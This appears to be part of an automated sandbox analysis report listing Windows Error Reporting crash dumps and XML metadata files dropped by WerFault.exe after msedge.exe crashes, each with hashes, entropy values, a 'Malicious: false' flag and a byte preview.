SSDEEP:	96:U8jOOLaE67tsA2OoqkONf0QXIDcQcc6o6cEncw34+HbHwbZH3g4sFTDZAX/d5FMJ:FjOXE67tbPJ0yU6NVjqzuiFWZ24lO8p
MD5:	2F9C24D6D915D080F770CB33F46CA33E
SHA1:	1CFB5F176B1F0647C3E5064CB96D413CA3EB37C9
SHA-256:	4C077834300A46CDAA5E9323A4D9BC97AA9D9ECA9EEA9D11326824C394D25DB3
SHA-512:	D5E69D622937ADC46899A7D7D7E4C9C4B82E4AC781B07AF329CB51D546A88C42E71956F5F0F5BF93974CAAD7082DFAB7321FAFC317D487E729BCC1541EBAD807
Malicious:	false
Reputation:	low
Preview:	..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.9.1.3.3.0.7.5.0.1.9.0.5.4.4.9.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....R.e.p.o.r.t.S.t.a.t.u.s.=.1.3.1.0.7.2.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.c.e.6.5.0.6.a.8.-.9.f.c.7.-.4.2.c.c.-.b.a.0.7.-.4.b.1.6.3.9.d.c.b.c.e.0.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.0.a.e.3.b.9.2.5.-.b.7.b.5.-.4.5.0.e.-.8.7.6.f.-.8.6.7.0.9.0.6.e.b.b.b.8.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....N.s.A.p.p.N.a.m.e.=.m.s.e.d.g.e...e.x.e.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.m.s.e.d.g.e...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.3.7.c.-.0.0.0.1.-.0.0.1.8.-.1.3.4.f.-.9.0.9.3.7.1.c.1.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.0.e.a.a.f.3.a.3.a.a.d.9.4.e.4.4.9.7.c.2.8.4.a.2.6.2.6.2.5.d.6.c.d.0.0.0.0.f.f.f.f.!.0.0.0.0.d.c.1.f.4.7.7.4.f.3.1.0.4.d.e.a.6.a.5.0.6.4.6.d.6.c.1.1.e.f.e.f.d.2.a.2.9.1.6.9.!.m.s.e.d.g.e...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.r.=.2.0.2.3././.0.9././.2.8.:.2.0.:.5.1.:.5.0.!.

C:\ProgramData\Microsoft\Windows\WER\Temp\WER6B32.tmp.dmp

Download File

Process:	C:\Windows\System32\WerFault.exe
File Type:	Mini DuMP crash report, 14 streams, Sat May 10 06:05:31 2025, 0x1205a4 type
Category:	dropped
Size (bytes):	28214
Entropy (8bit):	2.0334011342304406
Encrypted:	false
SSDEEP:	96:5+8tNDxcmqCy+uu11T0Ni7OaHJUfMozdFQdE8BdEyRbk4gWIiZfIP1i:zb1qAJ4OOaHJU0opFgEPyZkJ1
MD5:	4CA1265DF41FBDA355B15B4B24FFED25
SHA1:	245F096C766E94173C9899644B249173D2DDF8C3
SHA-256:	4EDB889F9B0412828B36E721CB6A383D4891E84EC380628A1986DB50646C3E61
SHA-512:	036967C07C66FDC8D872F9F8EF5E7865DDF1E7B3CD51587B171EA7FE44EA7250DA5C18FDF1D67C8E1202C2C217FDC9254736BF7290CC77CDF13218A9E570992E
Malicious:	false
Reputation:	low
Preview:	MDMP..a..... ..........h............4...............<...........l...........T.......8...........T................g......................................................................................................eJ......@.......Lw......................T..............h.............................0..............,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6...................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\Microsoft\Windows\WER\Temp\WER6BA0.tmp.WERInternalMetadata.xml

Download File

Process:	C:\Windows\System32\WerFault.exe
File Type:	XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	8516
Entropy (8bit):	3.6982828528782745
Encrypted:	false
SSDEEP:	192:R6l7wVeJbmNa6YOK6vgmfcBRpBO89bKSNfHXOm:R6lXJqg6Yb6vgmfcB5KgfHH
MD5:	DE2F62C50EDEE70C3F3A10DB35E62479
SHA1:	D875FC94672278F50FC27FEC9477BB3F90AA1527
SHA-256:	C8F17FC8248543CE0E6FB62C44D46CA284858FDE588D0879A39835C05763436A
SHA-512:	1DD2F82C3E37C65312701B8EAB56E27150A19647A0426E718224969195352486BB50DF8BCAE099638E4B68637A90D9CA5407B72FDBACFBA8AC82316F9BA20712
Malicious:	false
Reputation:	low
Preview:	..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.5.7.6.0.<./.P.i.

C:\ProgramData\Microsoft\Windows\WER\Temp\WER6BDF.tmp.xml

Download File

Process:	C:\Windows\System32\WerFault.exe
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	4707
Entropy (8bit):	4.454770892023554
Encrypted:	false
SSDEEP:	48:cvIwWl8zs8Jg771I90DrWOa8tMvYm8M4JGBRhFtyq85Kc+OnqUCaOUyidd:uIjf6I7D2OlqyJGBLXYqUoUyidd
MD5:	97ACE88D7050A4FAAE64C4FEAE48B3DC
SHA1:	FF7C9AD2056A4692DCD80E86551C492896C371F3
SHA-256:	940CA3E51E37DC57B1DAD629485062CBCC6C1264B117761C3D7A3A33E7C33865
SHA-512:	AC97804316AD973709FDB404858DE92DCF4D298D489B33658974B9A539F5ECDB77F006F6920B8D03F5BD4EF116834D7402521C7B347CDEAE55497010D049C689
Malicious:	false
Reputation:	low
Preview:	<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="842228" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

C:\ProgramData\Microsoft\Windows\WER\Temp\WER7071.tmp.dmp

Download File

Process:	C:\Windows\System32\WerFault.exe
File Type:	Mini DuMP crash report, 14 streams, Sat May 10 06:05:32 2025, 0x1205a4 type
Category:	dropped
Size (bytes):	28054
Entropy (8bit):	2.10908080333816
Encrypted:	false
SSDEEP:	96:5Z8NQKxcmqCy+uuiwph1i7OAHqJZoMx6fMfzdFcaZKMJfNPlwiUW+WIiZfInwzp:8aqqSph1OOAHqJOMM0fpFcaBfYiIwN
MD5:	FF0F5EB26F2D281FD48C47DBB3ED3840
SHA1:	63C58CC543C353CD78B59CF4726D3D9956A0206F
SHA-256:	A2C30F9AA7A3A7EC007E79C447A8F7121DE7EC374120C5F6AF886E684965DF8D
SHA-512:	9D34B0F86C37B0AD8F6293B58E480D873CD8EF7355308E07C7466004136490556FDC73417BCF4725CA0F9A7E0E453E7EE4245747509A819301D94CEDD955A339
Malicious:	false
Reputation:	low
Preview:	MDMP..a..... ..........h............4...............<...........l...........T.......8...........T................g......................................................................................................eJ......@.......Lw......................T..............h.............................0..............,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6...................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\Microsoft\Windows\WER\Temp\WER70B1.tmp.WERInternalMetadata.xml

Download File

Process:	C:\Windows\System32\WerFault.exe
File Type:	XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	8510
Entropy (8bit):	3.6975511607493843
Encrypted:	false
SSDEEP:	192:R6l7wVeJb2NqDe6YOZ6vgmfR4pB+89bhScfcrm:R6lXJa16Yo6vgmfRYhxfd
MD5:	9A5636EF186B0DAFD1179E16E8F935F0
SHA1:	5B1D29273274E24944DAD8E52FDAE6E2297AC335
SHA-256:	841418EDC9391BD7EFFA6FCBC67E0ED0D19F9761A1D4728D51D63B8F1DBFB17B
SHA-512:	E469808C2C52D69715BDE23B01E06BF522C6E91128C9CB51F28D8F6B7EEB5839C2091C5C9656484E60C7D6A610EA099515A29EED44DF4223C7AFCF78F453D6F2
Malicious:	false
Reputation:	low
Preview:	..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.5.7.6.0.<./.P.i.

C:\ProgramData\Microsoft\Windows\WER\Temp\WER70E1.tmp.xml

Download File

Process:	C:\Windows\System32\WerFault.exe
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	4699
Entropy (8bit):	4.453144311258884
Encrypted:	false
SSDEEP:	48:cvIwWl8zs8Jg771I90DrWOa8tFPYm8M4JGBRBeFbuPyq85KlE7OnqUCaOUyidd:uIjf6I7D2OlzSJGBn0uPXlHqUoUyidd
MD5:	8CFB90222571467BAF50D9A3F4A5F273
SHA1:	289272EAB1811C986FF2603B9F4A235F5096AD7A
SHA-256:	75EBB1E518B8D31FC97341319D249FBC31175EDE4E88FD1319DD7E42C2E7893C
SHA-512:	AF825A0E10A9BAAB928CD19A86B5292AAA2BC814DA21691B694F822AAF8A4EAEC6605A2BEFD1094A615C4FE7CEDCC1AF38D20F700FFA0D20D7E28ABE939BEE78
Malicious:	false
Reputation:	low
Preview:	<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="842228" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

C:\ProgramData\Microsoft\Windows\WER\Temp\WER7757.tmp.dmp

Download File

Process:	C:\Windows\System32\WerFault.exe
File Type:	Mini DuMP crash report, 14 streams, Sat May 10 06:05:34 2025, 0x1205a4 type
Category:	dropped
Size (bytes):	30270
Entropy (8bit):	1.9604048830042564
Encrypted:	false
SSDEEP:	96:5f8oTZLq3DcLzQG2yoi7X/V4VfH5ifa9/ViWI3bI/4CY4CI:qWpeOX/bSBVgCY4J
MD5:	011FC812627162BE422E79DD3F8FE184
SHA1:	F4411254663AC251E5DF6D65FD427492A3F0E7AB
SHA-256:	0C084FABDE305C12142B677012101D81F91555AB468C5205FA26297901A4FF99
SHA-512:	EC4CD312A7FDAF6FF24F14F93AD6F349FD1C87C31ED446EF36645D3EB81F4337C08CDFD97A16D8BD788A7549BFB20EE8191A65232A34C6B4E5BB1C48B2CD54EE
Malicious:	false
Reputation:	low
Preview:	MDMP..a..... ..........h............4...........X...<.......................T.......8...........T................l......................................................................................................eJ..............Lw......................T.......d......h.............................0..............,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6...................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\Microsoft\Windows\WER\Temp\WER77C5.tmp.WERInternalMetadata.xml

Download File

Process:	C:\Windows\System32\WerFault.exe
File Type:	XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	8520
Entropy (8bit):	3.6963343433867935
Encrypted:	false
SSDEEP:	192:R6l7wVeJO8n6YOo6pgmfJDBpBr89b3eNfJidm:R6lXJln6Y56pgmfJO3Mf/
MD5:	D4AD5514078B3A2422B60119FA129487
SHA1:	313643E8FE6A3DD386C14AD6BEDED1193EB225B3
SHA-256:	A038EEC8FA1999A01949D82C1D722E2619F60FBCBE6725E56FF9C1E457523A34
SHA-512:	A094AD6A940FE97F352D68E87D5F987A6DD6CF128A87BC94C302DE2BF39E27CF20587F9A3F666C18BDF9B6A194412D44652EBE982E42935EBE5B49CA2AA2781D
Malicious:	false
Reputation:	low
Preview:	..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.1.3.8.0.<./.P.i.

C:\ProgramData\Microsoft\Windows\WER\Temp\WER77F5.tmp.xml

Download File

Process:	C:\Windows\System32\WerFault.exe
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	4707
Entropy (8bit):	4.443497492427886
Encrypted:	false
SSDEEP:	48:cvIwWl8zs8Jg771I90DrWOa8tOYm8M4Jp1VgFvsdyq85MB6+BLz+d:uIjf6I7D2OlVJpDwcvBhBLz+d
MD5:	7F8C1333A61B7CF2E76060E11E45B3BB
SHA1:	CF604AFA10CE7440B87ECE8E15A56A7B872E558D
SHA-256:	7F8AADBBA1AF47996249B0E8B717385926E8C84D0FA64FBCF12A5186C0134DEA
SHA-512:	7821C4976C45B38038D5789E0D71CAE4CF6C6C555DE846322B120C0F28C0E2BDF2325DA370991B0837E5F82B8E8EB963E93D1F930BA8C0F4D15B175149A51CF8
Malicious:	false
Reputation:	low
Preview:	<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="842228" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

C:\ProgramData\Microsoft\Windows\WER\Temp\WER7B8D.tmp.dmp

Download File

Process:	C:\Windows\System32\WerFault.exe
File Type:	Mini DuMP crash report, 14 streams, Sat May 10 06:05:35 2025, 0x1205a4 type
Category:	dropped
Size (bytes):	29578
Entropy (8bit):	2.105679359023977
Encrypted:	false
SSDEEP:	96:56X8rTtLq3DcLzQzDOYi7XKuRVX4aQEkgeQXYhl6S8faRbWI0asI/5fnzks3rb:PvyOXKSVIDyVSMm/zks7
MD5:	2210130CFA245BBF83BFCCAE222AC57C
SHA1:	8E97E0AF22C3B891E0537122C11FD71987E62EEE
SHA-256:	7A721839A86E7719378B3D4E7B0832310AD12F580B2239E31E638422CA5DCFD7
SHA-512:	01A066AEDCFE2C73A61E9D9CF4BD85A0A7CB0C9B8AA868AA208A4C3D13C8E626DA06432D37E7DD59D7D406843E29FEEDDAAFCF76B1AB08DFE4417707968B715D
Malicious:	false
Preview:	MDMP..a..... ..........h............4...........X...<.......................T.......8...........T...........h..."l......................................................................................................eJ..............Lw......................T.......d......h.............................0..............,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6...................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\Microsoft\Windows\WER\Temp\WER7BCD.tmp.WERInternalMetadata.xml

Download File

Process:	C:\Windows\System32\WerFault.exe
File Type:	XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	8514
Entropy (8bit):	3.693735667343744
Encrypted:	false
SSDEEP:	192:R6l7wVeJOC306YO46pgmfH3jpBh89bueNf+dam:R6lXJTk6YJ6pgmfHyuMf+h
MD5:	8F17A42F4D2DB2CF2EDA0AB2233D3461
SHA1:	5C405E764710A89550553D75DBF27273D05E533A
SHA-256:	36C74538F5E99C2D34F041009FE183BDA5416A891DFE33619130A11DF522D403
SHA-512:	A3FB10AA1FD23939FC0684F57A19B378C4B6956E94641B8531C2B1F07662B352719939A6B7ECBC62C46E5BAA526E6A9A7A01095C91935752084289ACF0E6A953
Malicious:	false
Preview:	..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.1.3.8.0.<./.P.i.

C:\ProgramData\Microsoft\Windows\WER\Temp\WER7C0C.tmp.xml

Download File

Process:	C:\Windows\System32\WerFault.exe
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	4699
Entropy (8bit):	4.438391427266105
Encrypted:	false
SSDEEP:	48:cvIwWl8zs8Jg771I90DrWOa8tJYm8M4Jp1jiRFdyq85Mf6nuBLz+d:uIjf6I7D2OlOJpxwvfBBLz+d
MD5:	20F189160472B70E7BB334F66F8B2DCB
SHA1:	D49E17D62ED05BF0EBDF586420F56D3D16A59BCA
SHA-256:	595AB0BEC4BA78D2B41C5C9432E8E77DEAE4C70DAFC13DF490133D93F31643C7
SHA-512:	02E6702C62B18EF98A248C0598174E74A516E63BE23D875839A57D9470DCEAB7E2AB39069139BD23E70BE24EA67F6C8D4CA57D6B47541CF0871DF3E782151DE8
Malicious:	false
Preview:	<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="842228" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

C:\ProgramData\Microsoft\Windows\WER\Temp\WER89B6.tmp.dmp

Download File

Process:	C:\Windows\System32\WerFault.exe
File Type:	Mini DuMP crash report, 14 streams, Sat May 10 06:05:39 2025, 0x1205a4 type
Category:	dropped
Size (bytes):	27742
Entropy (8bit):	2.0607155121947844
Encrypted:	false
SSDEEP:	96:5W8qKxctqCy+uuuWfIxi7O5AMHJ6kc3fNTznGp3lXQWHWInHIP+kn:7UqxW4OOeMp6keh0ev+k
MD5:	90D1B53FBFF2B85189B973B1D014BB20
SHA1:	236E22FD46A8E32F0A649C887993425F35F72598
SHA-256:	A8B6AE156466CB63A6148A1AA15DD883682ECFCCB2084531514896549ABCA685
SHA-512:	725C2846CC6CF76058E7B185AED337FB983A7CB35C243615388AEFEE0841415C8A31206B9715D0E6EAC2A13294096436BC2897D8A527D1D590763B62A3132A53
Malicious:	false
Preview:	MDMP..a..... ..........h............4...............<...........l...........T.......8...........T................e......................................................................................................eJ......@.......Lw......................T..............h.............................0..............,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6...................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\Microsoft\Windows\WER\Temp\WER89F6.tmp.WERInternalMetadata.xml

Download File

Process:	C:\Windows\System32\WerFault.exe
File Type:	XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	8518
Entropy (8bit):	3.6994961732654206
Encrypted:	false
SSDEEP:	192:R6l7wVeJBQNH6YOt6dUgmfcBRpBU89bSLNfymm:R6lXJ2d6Y86OgmfcBPSxfK
MD5:	973CBAB2EBAC10BA8829DA3929C06310
SHA1:	0F201088F74B3A4F5565A69F153CF7F104A54D4A
SHA-256:	8B6D4274B716D123D00CE66104A9F564AB19D6CEC2C37F1E378FCB0BFB054809
SHA-512:	75D7BAEEECB81FBE1A083C480C4F02F9C20C6B1CDE3268C2A0DADD761259CA64551E9D3C06DC52147197CEBE3AAD2D5D8384DD0523EB1DA8D50D474B35E85B8B
Malicious:	false
Preview:	..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. 